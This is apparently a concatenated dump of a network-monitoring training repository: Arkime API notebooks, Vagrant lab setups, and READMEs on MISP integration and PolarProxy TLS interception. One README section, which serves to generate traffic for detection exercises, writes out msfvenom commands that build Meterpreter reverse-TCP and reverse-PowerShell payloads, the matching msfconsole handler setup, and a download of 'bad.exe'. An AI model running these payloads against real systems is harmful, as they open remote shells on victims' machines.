"tags": [] 227 | }, 228 | "outputs": [], 229 | "source": [ 230 | "misp.update_event(event=result)" 231 | ] 232 | } 233 | ], 234 | "metadata": { 235 | "kernelspec": { 236 | "display_name": "Python 3 (ipykernel)", 237 | "language": "python", 238 | "name": "python3" 239 | }, 240 | "language_info": { 241 | "codemirror_mode": { 242 | "name": "ipython", 243 | "version": 3 244 | }, 245 | "file_extension": ".py", 246 | "mimetype": "text/x-python", 247 | "name": "python", 248 | "nbconvert_exporter": "python", 249 | "pygments_lexer": "ipython3", 250 | "version": "3.12.3" 251 | } 252 | }, 253 | "nbformat": 4, 254 | "nbformat_minor": 5 255 | } 256 | -------------------------------------------------------------------------------- /Arkime/misp_wise/README.md: -------------------------------------------------------------------------------- 1 | # MISP to WISE integration 2 | 3 | ## MISP setup 4 | 5 | * https://github.com/MISP/misp-docker 6 | 7 | # Set up jupyter notebook 8 | 9 | Jupyter notebook is a useful tool for interactive scripting, especially around anything involving interaction with data. 
10 | 11 | ``` 12 | apt install python3-pip python3-venv 13 | python3 -m venv /jupyter 14 | source /jupyter/bin/activate 15 | pip install jupyter jupyterlab pandas numpy pymisp 16 | ``` 17 | 18 | ``` 19 | jupyter lab --no-browser --allow-root --ip 192.168.56.12 20 | ``` 21 | -------------------------------------------------------------------------------- /Arkime/package_setup/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | $arkime = <<-SCRIPT 4 | ARKIME_VERSION="5.2.0" 5 | UBUNTU_VERSION="2204" 6 | 7 | ARKIME_LINK="https://github.com/arkime/arkime/releases/download/v${ARKIME_VERSION}/arkime_${ARKIME_VERSION}-1.ubuntu${UBUNTU_VERSION}_amd64.deb" 8 | ARKIME_JA4_LINK="https://github.com/arkime/arkime/releases/download/v${ARKIME_VERSION}/ja4plus.amd64.so" 9 | 10 | wget $ARKIME_LINK 11 | wget $ARKIME_JA4_LINK 12 | pwd 13 | SCRIPT 14 | 15 | $swap = <<-SCRIPT 16 | swapon --show | grep "NAME" && exit 1 17 | dd if=/dev/zero of=/swapfile bs=1024 count=2097152 18 | mkswap /swapfile 19 | chmod 600 /swapfile 20 | swapon /swapfile 21 | swapon --show 22 | SCRIPT 23 | 24 | NAME="setup" 25 | CPU=4 26 | MEM=4096 27 | 28 | Vagrant.configure(2) do |config| 29 | config.vm.define NAME do |box| 30 | box.vm.box = "generic/ubuntu2204" 31 | box.vm.hostname = NAME 32 | box.vm.network :private_network, ip: "192.168.56.12" 33 | box.vm.provider :virtualbox do |vb, override| 34 | override.vm.box = "ubuntu/jammy64" 35 | vb.customize ["modifyvm", :id, "--memory", MEM] 36 | vb.customize ["modifyvm", :id, "--cpus", CPU] 37 | end 38 | box.vm.provider "libvirt" do |v, override| 39 | v.cpus = CPU 40 | v.memory = MEM 41 | end 42 | box.vm.provider :hyperv do |hv, override| 43 | hv.cpus = CPU 44 | hv.maxmemory = MEM 45 | override.vm.synced_folder ".", "/vagrant", type: "smb" 46 | end 47 | box.vm.provider :vmware_desktop do |v, override| 48 | v.vmx["numvcpus"] = CPU 49 | v.vmx["memsize"] = MEM 50 | end 51 | box.vm.provision "docker", images: [ 52 | # "docker.elastic.co/elasticsearch/elasticsearch:8.13.4", 53 | "redis" 54 | ] 55 | box.vm.provision "shell", inline: $swap 56 | box.vm.provision "shell", inline: $arkime 57 | end 58 | end 59 | -------------------------------------------------------------------------------- /Arkime/pikksilm/README.md: -------------------------------------------------------------------------------- 1 | # Pikksilm 2 | 3 | * [Pikksilm](https://github.com/markuskont/pikksilm) 4 | * [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) 5 | * [sysmon modular](https://github.com/olafhartong/sysmon-modular) 6 | * [verbose sysmon config](https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml) 7 | * [Winlogbeat](https://www.elastic.co/beats/winlogbeat) 8 | 9 | ## Generating interesting traffic 10 | 11 | * [installing metasploit on linux](https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/#installing-the-metasploit-framework-on-linux) 12 | 13 | ### Delivery 14 | 15 | ``` 16 | Invoke-WebRequest http://server:8000/bad.exe -UseBasicParsing -OutFile bad.exe 17 | ``` 18 | 19 | ### Reverse TCP 20 | 21 | ``` 22 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=53 -f exe > bad.exe 23 | ``` 24 | 25 | ``` 26 | msfconsole 27 | 28 | msf6 > use exploit/multi/handler 29 | 30 | msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 31 | msf6 exploit(multi/handler) > set lhost eth0 32 | msf6 exploit(multi/handler) > set lport 
53 33 | msf6 exploit(multi/handler) > exploit 34 | 35 | meterpreter > dir 36 | 37 | ``` 38 | 39 | ### Reverse PS 40 | 41 | ``` 42 | msfvenom -p cmd/windows/reverse_powershell lhost=eth0 lport=8089 > shell.bat 43 | ``` 44 | 45 | ``` 46 | msfconsole 47 | 48 | msf6 > use exploit/multi/handler 49 | 50 | msf6 exploit(multi/handler) > set payload cmd/windows/reverse_powershell 51 | msf6 exploit(multi/handler) > set lhost eth0 52 | msf6 exploit(multi/handler) > set LPORT 8089 53 | msf6 exploit(multi/handler) > exploit 54 | ``` 55 | -------------------------------------------------------------------------------- /Arkime/polarproxy/README.md: -------------------------------------------------------------------------------- 1 | # Polarproxy 2 | 3 | * https://www.netresec.com/?page=PolarProxy 4 | * https://www.netresec.com/?page=Blog&month=2020-12&post=Capturing-Decrypted-TLS-Traffic-with-Arkime 5 | * https://arkime.com/settings#reader-poi 6 | 7 | ## Setting up Polarproxy 8 | 9 | Get polarproxy and set it up in /opt/PolarProxy dir 10 | 11 | ``` 12 | mkdir /opt/PolarProxy 13 | cd /opt/PolarProxy 14 | wget -O polarproxy.tar.gz 'https://www.netresec.com/?download=PolarProxy' 15 | tar -zxvf polarproxy.tar.gz 16 | ``` 17 | 18 | ### Systemd service 19 | 20 | PolarProxy comes with a sample Systemd service file in `PolarProxy.service` file. We slightly edit it to make use of different directory paths and user accounts. Copy or create the `/etc/systemd/system/PolarProxy.service` file. 21 | 22 | ``` 23 | [Unit] 24 | Description=PolarProxy TLS pcap logger 25 | After=network.target 26 | 27 | [Service] 28 | SyslogIdentifier=PolarProxy 29 | Type=simple 30 | WorkingDirectory=/opt/PolarProxy 31 | ExecStart=/opt/PolarProxy/PolarProxy -v -p 10443,80,443 -x /var/log/PolarProxy/polarproxy.cer -f /var/log/PolarProxy/proxyflows.log -o /var/log/PolarProxy/ --certhttp 10080 --socks 1080 --httpconnect 8080 --nontls allow --leafcert sign --pcapoveripconnect 127.0.0.1:57012 32 | KillSignal=SIGINT 33 | FinalKillSignal=SIGTERM 34 | 35 | [Install] 36 | WantedBy=multi-user.target 37 | ``` 38 | 39 | ## Configuring Arkime to accept PCAP over IP 40 | 41 | If we set Arkime to capture PCAP over IP connections, it will no longer listen on the network interfaces. For that, it would make sense to spin up another Arkime instance. 42 | 43 | A native way to do this is by adding another arkime Node. Add this section at the end of your `config.ini`. 44 | 45 | ``` 46 | [polar] 47 | ``` 48 | 49 | Change the `pcapReadMethod` in the polar section of the config file. We can override some other values as well. Arkime capture node needs a corresponding viewer node. Since they might be on the same host as live capture, then their ports might collide. Finally, PCAP compression might also get in the way, as proxy traffic volume is quite low and arkime cannot rebuild sessions from PCAP files that are being actively written to. 50 | 51 | ``` 52 | pcapReadMethod=pcap-over-ip-server 53 | viewPort=8006 54 | simpleCompression=none 55 | ``` 56 | 57 | Let's create a new arkime service for PolarProxy capture. We also need a corresponding viewer when using node configuration. 58 | 59 | ``` 60 | cp /etc/systemd/system/arkimecapture.service /etc/systemd/system/arkimepolar.service 61 | cp /etc/systemd/system/arkimeviewer.service /etc/systemd/system/arkimeviewerpolar.service 62 | ``` 63 | 64 | Comment the `ExecStartPre`, since we don't need to configure any actual interfaces. 
Modify the `ExecStart` to reflect the new paths and also create a separate log file to distinguish separate processes. 65 | 66 | ``` 67 | ... 68 | ExecStart=/opt/arkime/bin/capture -c /opt/arkime/etc/config.ini --node polar 69 | ... 70 | ``` 71 | 72 | Make sure to also do this with viewer node in `arkimeviewerpolar.service`. 73 | 74 | ``` 75 | ... 76 | ExecStart=/opt/arkime/bin/node viewer.js -c /opt/arkime/etc/config.ini --node polar 77 | ... 78 | ``` 79 | 80 | Before starting the new systemd services, make sure that all the paths and directories actually exists on the system. For example: 81 | 82 | ``` 83 | mkdir /var/log/PolarProxy 84 | ``` 85 | 86 | Start the new services. 87 | 88 | ``` 89 | systemctl daemon-reload 90 | 91 | systemctl enable --now arkimepolar.service 92 | 93 | systemctl enable --now arkimeviewerpolar.service 94 | 95 | systemctl start PolarProxy.service 96 | ``` 97 | Let's test if we can take our proxy for a spin... 98 | 99 | ``` 100 | curl --connect-to www.netresec.com:443:127.0.0.1:10443 https://www.netresec.com/ 101 | ``` 102 | 103 | As expected with self-signed certs, they are not trusted. You can add the `--insecure` flag to the `curl` command above to ignore any certificate issues. 104 | 105 | Now wait a minute or two and let's check if we can see that traffic in Arkime. 106 | 107 | 108 | ## Adding a trusted certificate 109 | 110 | In our env, PolarProxy exports its public certificate to `/var/log/PolarProxy/polarproxy.cer` 111 | 112 | ### Linux 113 | 114 | We can make our machine to trust it with the following. Make sure to select the `extra/PolarProxy-root-CA.crt` Certificate Authority when prompted. 115 | 116 | ``` 117 | sudo mkdir /usr/share/ca-certificates/extra 118 | sudo openssl x509 -inform DER -in /var/log/PolarProxy/polarproxy.cer -out /usr/share/ca-certificates/extra/PolarProxy-root-CA.crt 119 | sudo dpkg-reconfigure ca-certificates 120 | ``` 121 | 122 | Now this command should work without issues 123 | 124 | ``` 125 | curl --connect-to www.netresec.com:443:127.0.0.1:10443 https://www.netresec.com/ 126 | ``` 127 | 128 | Ideally, instead of tricking around with curl, you would redirect all traffic outbound to port 443 via your PolarProxy. 129 | 130 | ### Windows 131 | 132 | * https://docs.microsoft.com/en-us/skype-sdk/sdn/articles/installing-the-trusted-root-certificate 133 | 134 | ``` 135 | MMC -> Add / remove stap-in -> certificates -> local computer -> Import 136 | ``` 137 | -------------------------------------------------------------------------------- /Arkime/prepare-laptop.md: -------------------------------------------------------------------------------- 1 | # Instructions for setting up the environment locally 2 | 3 | Note, these instructions are for running a local instance of the tools in a VM. In the classroom, VMs have been prepared for you so you do not need to set this up before coming to class. But you can... :) 4 | 5 | 6 | ## System requirements for running these tools locally 7 | * CPU: Modern 64-bit CPU, Apple Silicon has not been tested and is likely not supported. 8 | * RAM: 16GB or more system memory; 9 | * Disk: Minimum 50GB of free disk space, 100GB or more recommended. SSD preferred; 10 | * Privileges: Root or Administrator privileges on the host OS. 
11 | 12 | 13 | 14 | # As a preparation, try to run Arkime (& Suricata (&& others)) in a single box 15 | 16 | * Singlehost setup - full vagrant environment that includes Arkime capture, viewer, backend document storage, threat intelligence and IDS tagging 17 | 18 | * **[Arkime](https://arkime.com/)** is full packet capturing, indexing, and searching system. 19 | * Arkime is not an IDS 20 | * Some other software is necessary: 21 | * **[WISE](https://arkime.com/wise)** is part of Arkime. Wise is helper service to check external knowledge before saving session index data. 22 | * **[ElasticSearch](/common/elastic/)** is a search engine based on Lucene. 23 | * We will also have: 24 | * **[Suricata](https://suricata.io/)** is a network threat detection engine. 25 | * **[Redis](https://redis.io/)** is a in-memory data structure storage and message broker. Good for sharing data between multiple applications. 26 | 27 | 28 | ### Instructions 29 | 30 | A quick way to get a classroom-like||testing||development environment up and running is with **Vagrant**. You will need recent versions of [Vagrant](https://www.vagrantup.com/) and [VirtualBox](https://www.virtualbox.org/) installed. 31 | 32 | *NB! Vagrant v2.2.19 repository installation has a known issue with Ubuntu 22.04 LTS host system. Meanwhile, you can just use the fixed Linux binary download (also version v2.2.19) at the bottom of the [Vagrant Downloads page](https://www.vagrantup.com/downloads).* 33 | 34 | Install the latest versions of Vagrant and VirtualBox for your operating systems, and then run: 35 | 36 | vagrant status 37 | 38 | If you get any error message, [fix them before creating any VMs](https://www.vagrantup.com/docs/virtualbox/common-issues.html). 39 | 40 | Starting from VirtualBox v6.1.28 it is only allowed to provision VMs belonging to the 192.168.56.0/24 network range. To disable network range control (for both IPv4 and IPv6), add the following line to `/etc/vbox/networks.conf`. You have to create the file and directory if it does not exist yet.: 41 | 42 | * 0.0.0.0/0 ::/0 43 | 44 | You should be able to run these following commands as a regular (non-root) user. 45 | 46 | To create and provision a the `singlehost` virtual machine: 47 | 48 | mkdir something 49 | cd something 50 | vagrant box add ubuntu/jammy64 51 | wget https://raw.githubusercontent.com/ccdcoe/CDMCS/master/singlehost/Vagrantfile 52 | wget https://raw.githubusercontent.com/ccdcoe/CDMCS/master/singlehost/provision.sh 53 | vagrant up 54 | 55 | Running `vagrant up` for the first time will run provisioning, which will: 56 | - Download the Ubuntu LTS base image if there is not a copy on your machine already. 57 | - Create a new VirtualBox virtual machine from that image 58 | - Run the provisioning script [provision.sh](https://raw.githubusercontent.com/ccdcoe/CDMCS/master/singlehost/provision.sh) [(2)](#readitbeforeyouexecuteit) 59 | 60 | The Vagrant box will automatically start after provisioning. It can be started in future with `vagrant up` from the *dirnameyoujustcreated* directory. 61 | 62 | Once the Ubuntu virtual machine has booted, it will start Arkime (and Suricata and Evebox and Elasticsearch). You can then access your **Arkime viewer** at **http://192.168.10.11:8005**. By default, your development environment will have an admin account created for you to use - the username will be `admin` and the password will be `admin`. Here, at the prompt, you can try with `vagrant:vagrant`. 63 | 64 | To connect to the server via SSH, simply run `vagrant ssh`. 
If you are running Windows (without ssh on your PATH), this might not work. Please fix it or find alternative means of connecting to your box via SSH. 65 | 66 | To stop the server VM, simply run `vagrant halt`. 67 | To delete/destroy the server VM, simply run `vagrant destroy`. 68 | 69 | Should you need to access the virtual machine (for example, to manually fix something without restarting the box), run `vagrant ssh` from the *dirnameyoujustcreated* folder. You will now be logged in as the `ubuntu` user. 70 | 71 | ## Troubleshooting 72 | If your instance or Vagrant box are really not behaving, you can re-run the provisioning process. Stop the box with `vagrant halt`, and then run `vagrant destroy` - this will delete the virtual machine. You may then run `vagrant up` to create a new box, and re-run provisioning. 73 | 74 | Remember, managing specific Vagrant VMs is couple to the directory of the `Vagrantfile`. So the current working directory (CWD) of your terminal should be 75 | 76 | 77 | ## Support/help 78 | 79 | * If you are confused, or having any issues with the above, join the Arkime Slack server (https://slackinvite.arkime.com/) or Suricata IRC channel (irc.freenode.net #suricata). 80 | 81 | ---- 82 | 83 | (1) :: Or build your own box, see [here](https://www.vagrantup.com/docs/boxes/base.html) 84 | 85 | (2) :: Whenever you have to execute a shell script from the web, first open url in your web browser to make sure the script is not malicious and is safe to run. 86 | -------------------------------------------------------------------------------- /Arkime/queries/003-export-pcap.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Downloading raw PCAP\n", 8 | "\n", 9 | "* https://github.com/aol/moloch/wiki/API#sessionspcap\n", 10 | "\n", 11 | "We can download raw PCAP data, as opposed to indexed metadata, via `sessions.pcap` endpoint. Can be useful if you wish to extract capture data for closer investigation in wireshark. Start by setting up variables, as always." 12 | ] 13 | }, 14 | { 15 | "cell_type": "code", 16 | "execution_count": 25, 17 | "metadata": {}, 18 | "outputs": [], 19 | "source": [ 20 | "import requests\n", 21 | "from requests.auth import HTTPDigestAuth\n", 22 | "user=\"vagrant\"\n", 23 | "passwd=\"vagrant\"\n", 24 | "auth=HTTPDigestAuth(user, passwd)" 25 | ] 26 | }, 27 | { 28 | "cell_type": "markdown", 29 | "metadata": {}, 30 | "source": [ 31 | "Then extract all DNS packets by Moloch query. Note the `stream=True` parameter for our GET request. **This is very important, as you do not want your script to pull all PCAP data into memory before writing out the file**." 32 | ] 33 | }, 34 | { 35 | "cell_type": "code", 36 | "execution_count": 26, 37 | "metadata": {}, 38 | "outputs": [], 39 | "source": [ 40 | "query = {\n", 41 | " \"expression\": \"protocols == dns && dns.host == berylia.org\",\n", 42 | " \"date\": 1,\n", 43 | "}\n", 44 | "resp = requests.get(\"http://192.168.10.13:8005/sessions.pcap\", params=query, auth=auth, stream=True)" 45 | ] 46 | }, 47 | { 48 | "cell_type": "markdown", 49 | "metadata": {}, 50 | "source": [ 51 | "Stream the response data into a newly create file. Open the file in wireshark to verify output." 
52 | ] 53 | }, 54 | { 55 | "cell_type": "code", 56 | "execution_count": 27, 57 | "metadata": {}, 58 | "outputs": [], 59 | "source": [ 60 | "with open(\"/vagrant/dns-berylia.pcap\", 'wb') as f:\n", 61 | " for chunk in resp.iter_content(chunk_size=8192):\n", 62 | " if chunk: # filter out keep-alive new chunks\n", 63 | " f.write(chunk)" 64 | ] 65 | }, 66 | { 67 | "cell_type": "markdown", 68 | "metadata": {}, 69 | "source": [ 70 | "Note that multiple sessions get clumpted into a single PCAP stream when relying on Moloch expressions. Alternatively, `ids` parameter can be specified to download specific sessions one by one and to write each session into a distinct output file. For example, we can extract a list of example session ID-s via CSV or UNIQUE endpoint." 71 | ] 72 | }, 73 | { 74 | "cell_type": "code", 75 | "execution_count": 28, 76 | "metadata": {}, 77 | "outputs": [ 78 | { 79 | "name": "stdout", 80 | "output_type": "stream", 81 | "text": [ 82 | "['190522-tAIbGZrl6xpCVLZj2bl_S1lC', '190522-tAJRqThOVJhLtbrhKDTeq0Bt', '190522-tALAA6vM5_VCk7L3XxVwCA2m', '190522-tAIPovzkOupJuL7UTkfdn_Vy', '190522-tAKtD5JXy2xNXpNl5h0qSlQR', '190522-tAKl1A73clNLvqWs15y1wZIj', '190522-tAJV2FBAL8FDbY7c-y0MbSVN', '190522-tALVEPKxwH9EaLaeV7PYq1XV', '190522-tAIAze0zGC5IX4AOOziGUjZr', '190522-tALa6KLjgwtM1LPM3dZVA_wz', '190522-tAJBMxxLhaxPOaVjeBUwZvMg', '190522-tAIdrT8OC11Fg7cFuYf_xZ3w', '190522-tAIsjQzSRhFCG4DAkEOW0CgZ', '190522-tAICmKIWPgZIe4AWScJl0eEx']\n" 83 | ] 84 | } 85 | ], 86 | "source": [ 87 | "import datetime as dt\n", 88 | "end = int(dt.datetime.now().strftime(\"%s\"))\n", 89 | "start = end - 5*60\n", 90 | "r = requests.get(\"http://192.168.10.13:8005/sessions.csv\", params={\n", 91 | " \"startTime\": start,\n", 92 | " \"stopTime\": end,\n", 93 | " \"date\": 1,\n", 94 | " \"expression\": \"host.dns == berylia.org\",\n", 95 | " \"fields\": \",\".join([\n", 96 | " \"_id\"\n", 97 | " ])\n", 98 | "}, auth=auth)\n", 99 | "ids = r.text.split(\"\\r\\n\")\n", 100 | "# Drop csv header\n", 101 | "ids = ids[1:]\n", 102 | "# Get rid of empty element from last newline\n", 103 | "ids = [i for i in ids if len(i) > 0]\n", 104 | "print(ids)" 105 | ] 106 | }, 107 | { 108 | "cell_type": "code", 109 | "execution_count": 29, 110 | "metadata": {}, 111 | "outputs": [], 112 | "source": [ 113 | "for i in ids:\n", 114 | " query = {\n", 115 | " \"ids\": i,\n", 116 | " \"date\": 1,\n", 117 | " }\n", 118 | " resp = requests.get(\"http://192.168.10.13:8005/sessions.pcap\", params=query, auth=auth, stream=True)\n", 119 | " with open(\"/vagrant/{}.pcap\".format(i), 'wb') as f:\n", 120 | " for chunk in resp.iter_content(chunk_size=8192):\n", 121 | " if chunk: # filter out keep-alive new chunks\n", 122 | " f.write(chunk)" 123 | ] 124 | }, 125 | { 126 | "cell_type": "markdown", 127 | "metadata": {}, 128 | "source": [ 129 | "# Tasks\n", 130 | "\n", 131 | "See [suricata eve.json parsing example](https://github.com/ccdcoe/CDMCS/blob/master/Suricata/indexing/001-load-eve.ipynb). \n", 132 | "* Load `community_id` values from `alert` events in `/var/log/suricata/eve.json`. Write raw pcap data for each `community_id` into a distinct pcap file." 
133 | ] 134 | }, 135 | { 136 | "cell_type": "code", 137 | "execution_count": null, 138 | "metadata": {}, 139 | "outputs": [], 140 | "source": [] 141 | } 142 | ], 143 | "metadata": { 144 | "kernelspec": { 145 | "display_name": "Python 3", 146 | "language": "python", 147 | "name": "python3" 148 | }, 149 | "language_info": { 150 | "codemirror_mode": { 151 | "name": "ipython", 152 | "version": 3 153 | }, 154 | "file_extension": ".py", 155 | "mimetype": "text/x-python", 156 | "name": "python", 157 | "nbconvert_exporter": "python", 158 | "pygments_lexer": "ipython3", 159 | "version": "3.6.7" 160 | } 161 | }, 162 | "nbformat": 4, 163 | "nbformat_minor": 2 164 | } 165 | -------------------------------------------------------------------------------- /Arkime/queries/004-tagging.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Adding and removing tags\n", 8 | "\n", 9 | "* https://github.com/aol/moloch/wiki/API#addtags\n", 10 | "\n", 11 | "Sessions can be marked with custom *tags*, so afterward we could include or exclude these sessions by simple `tags == ` query. Like before, start by setting up modules and auth variables." 12 | ] 13 | }, 14 | { 15 | "cell_type": "code", 16 | "execution_count": 2, 17 | "metadata": {}, 18 | "outputs": [], 19 | "source": [ 20 | "import requests\n", 21 | "from requests.auth import HTTPDigestAuth\n", 22 | "user=\"vagrant\"\n", 23 | "passwd=\"vagrant\"\n", 24 | "auth=HTTPDigestAuth(user, passwd)" 25 | ] 26 | }, 27 | { 28 | "cell_type": "markdown", 29 | "metadata": {}, 30 | "source": [ 31 | "Unline previous endpoints, we are not just pulling data. So we need to do HTTP POST with a comma separated list of tags in POST body." 32 | ] 33 | }, 34 | { 35 | "cell_type": "code", 36 | "execution_count": 11, 37 | "metadata": {}, 38 | "outputs": [ 39 | { 40 | "name": "stdout", 41 | "output_type": "stream", 42 | "text": [ 43 | "{\"success\":true,\"text\":\"Tags added successfully\"}\n" 44 | ] 45 | } 46 | ], 47 | "source": [ 48 | "query = {\n", 49 | " \"expression\": \"protocols == dns && (dns.host == berylia.org || dns.host == www.facebook.com || dns.host == sysadminnid.tumblr.com)\",\n", 50 | " \"date\": 1,\n", 51 | "}\n", 52 | "tags = [\n", 53 | " \"traffic\",\n", 54 | " \"generated\",\n", 55 | " \"good\"\n", 56 | "]\n", 57 | "tags = \",\".join(tags)\n", 58 | "resp = requests.post(\"http://192.168.10.13:8005/addTags\", params=query, auth=auth, json={\n", 59 | " \"tags\": tags\n", 60 | "})\n", 61 | "print(resp.text)" 62 | ] 63 | }, 64 | { 65 | "cell_type": "markdown", 66 | "metadata": {}, 67 | "source": [ 68 | "Other queries can receive a different set of tags." 
69 | ] 70 | }, 71 | { 72 | "cell_type": "code", 73 | "execution_count": 12, 74 | "metadata": {}, 75 | "outputs": [ 76 | { 77 | "name": "stdout", 78 | "output_type": "stream", 79 | "text": [ 80 | "{\"success\":true,\"text\":\"Tags added successfully\"}\n" 81 | ] 82 | } 83 | ], 84 | "source": [ 85 | "query = {\n", 86 | " \"expression\": \"protocols == dns && (dns.host == self-signed.badssl.com || dns.host == testmyids.com)\",\n", 87 | " \"date\": 1,\n", 88 | "}\n", 89 | "tags = [\n", 90 | " \"traffic\",\n", 91 | " \"generated\",\n", 92 | " \"bad\"\n", 93 | "]\n", 94 | "tags = \",\".join(tags)\n", 95 | "resp = requests.post(\"http://192.168.10.13:8005/addTags\", params=query, auth=auth, json={\n", 96 | " \"tags\": tags\n", 97 | "})\n", 98 | "print(resp.text)" 99 | ] 100 | }, 101 | { 102 | "cell_type": "markdown", 103 | "metadata": {}, 104 | "source": [ 105 | "Now we no longer have to write the complex query when looking for specific traffic subset." 106 | ] 107 | }, 108 | { 109 | "cell_type": "code", 110 | "execution_count": 13, 111 | "metadata": {}, 112 | "outputs": [ 113 | { 114 | "name": "stdout", 115 | "output_type": "stream", 116 | "text": [ 117 | "berylia.org\n", 118 | "star-mini.c10r.facebook.com\n", 119 | "www.facebook.com\n", 120 | "sysadminnid.tumblr.com\n", 121 | "\n" 122 | ] 123 | } 124 | ], 125 | "source": [ 126 | "query = {\n", 127 | " \"expression\": \"tags == generated && tags == good\",\n", 128 | " \"exp\": \"dns.host\"\n", 129 | "}\n", 130 | "resp = requests.get(\"http://192.168.10.13:8005/unique.txt\", params=query, auth=auth)\n", 131 | "print(resp.text)" 132 | ] 133 | }, 134 | { 135 | "cell_type": "code", 136 | "execution_count": 14, 137 | "metadata": {}, 138 | "outputs": [ 139 | { 140 | "name": "stdout", 141 | "output_type": "stream", 142 | "text": [ 143 | "testmyids.com\n", 144 | "self-signed.badssl.com\n", 145 | "\n" 146 | ] 147 | } 148 | ], 149 | "source": [ 150 | "query = {\n", 151 | " \"expression\": \"tags == generated && tags == bad\",\n", 152 | " \"exp\": \"dns.host\"\n", 153 | "}\n", 154 | "resp = requests.get(\"http://192.168.10.13:8005/unique.txt\", params=query, auth=auth)\n", 155 | "print(resp.text)" 156 | ] 157 | }, 158 | { 159 | "cell_type": "markdown", 160 | "metadata": {}, 161 | "source": [ 162 | "Likewise, tags can be removed. For example, `traffic` tag is quite useless currently. Make sure that your API user has permissions to remove data though." 163 | ] 164 | }, 165 | { 166 | "cell_type": "code", 167 | "execution_count": 17, 168 | "metadata": {}, 169 | "outputs": [], 170 | "source": [ 171 | "query = {\n", 172 | " \"expression\": \"tags == traffic\",\n", 173 | " \"date\": 1,\n", 174 | "}\n", 175 | "resp = requests.post(\"http://192.168.10.13:8005/removeTags\", params=query, auth=auth, json={\n", 176 | " \"tags\": \"traffic\"\n", 177 | "})" 178 | ] 179 | }, 180 | { 181 | "cell_type": "code", 182 | "execution_count": 18, 183 | "metadata": {}, 184 | "outputs": [ 185 | { 186 | "name": "stdout", 187 | "output_type": "stream", 188 | "text": [ 189 | "{\"success\":true,\"text\":\"Tags removed successfully\"}\n" 190 | ] 191 | } 192 | ], 193 | "source": [ 194 | "print(resp.text)" 195 | ] 196 | }, 197 | { 198 | "cell_type": "markdown", 199 | "metadata": {}, 200 | "source": [ 201 | "# Tasks\n", 202 | "\n", 203 | "Consider the suricata `community_id` task from last notebook. Write a script that extracts suricata Signature and Severity fields from Alert JSON. 
Tag moloch sessions that have corresponding Suricata IDS alerts with this information.\n", 204 | "* Whitespace in signature name will not fly, replace that with underscore or dash;\n", 205 | "* Likewise, consider lowercasing the signature name;\n", 206 | "* A simple severity value number as tag is too vague, actual value in Moloch should be `suri-prio-1`, `suri-prio-2` and `suri-prio-3`;\n", 207 | "* If using classroom server, prepend your name in front of the tag;" 208 | ] 209 | }, 210 | { 211 | "cell_type": "code", 212 | "execution_count": null, 213 | "metadata": {}, 214 | "outputs": [], 215 | "source": [] 216 | } 217 | ], 218 | "metadata": { 219 | "kernelspec": { 220 | "display_name": "Python 3", 221 | "language": "python", 222 | "name": "python3" 223 | }, 224 | "language_info": { 225 | "codemirror_mode": { 226 | "name": "ipython", 227 | "version": 3 228 | }, 229 | "file_extension": ".py", 230 | "mimetype": "text/x-python", 231 | "name": "python", 232 | "nbconvert_exporter": "python", 233 | "pygments_lexer": "ipython3", 234 | "version": "3.6.7" 235 | } 236 | }, 237 | "nbformat": 4, 238 | "nbformat_minor": 2 239 | } 240 | -------------------------------------------------------------------------------- /Arkime/queries/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | $script = <<-SCRIPT 4 | systemctl stop systemd-resolved.service 5 | echo "nameserver 1.1.1.1" > /etc/resolv.conf 6 | SCRIPT 7 | 8 | $docker = <<-SCRIPT 9 | export DEBIAN_FRONTEND=noninteractive 10 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 11 | apt-get -qq -y install \ 12 | apt-transport-https \ 13 | ca-certificates \ 14 | curl \ 15 | gnupg-agent \ 16 | software-properties-common 17 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 18 | add-apt-repository \ 19 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 20 | $(lsb_release -cs) \ 21 | stable" 22 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 23 | systemctl enable docker.service 24 | systemctl start docker.service 25 | SCRIPT 26 | 27 | $jupyter = <<-SCRIPT 28 | apt-get update && apt-get install -y python3 python3-pip 29 | su - vagrant -c "pip3 install --user --upgrade jupyter jupyterlab elasticsearch matplotlib" 30 | su - vagrant -c "pip3 install --user --upgrade chardet" 31 | su - vagrant -c "pip3 install --user --upgrade urllib3" 32 | su - vagrant -c "mkdir ~/.jupyter" 33 | cat >> /home/vagrant/.jupyter/jupyter_notebook_config.json < /etc/resolv.conf 6 | SCRIPT 7 | 8 | $docker = <<-SCRIPT 9 | export DEBIAN_FRONTEND=noninteractive 10 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 11 | apt-get -qq -y install \ 12 | apt-transport-https \ 13 | ca-certificates \ 14 | curl \ 15 | gnupg-agent \ 16 | software-properties-common 17 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 18 | add-apt-repository \ 19 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 20 | $(lsb_release -cs) \ 21 | stable" 22 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 23 | systemctl enable docker.service 24 | systemctl start docker.service 25 | SCRIPT 26 | 27 | $moloch = <<-SCRIPT 28 | apt-get update && apt-get install build-essential git 29 | mkdir /home/vagrant/build 30 | git clone https://github.com/aol/moloch.git /home/vagrant/build/moloch 31 | chown -R vagrant:vagrant /home/vagrant/build 32 | 
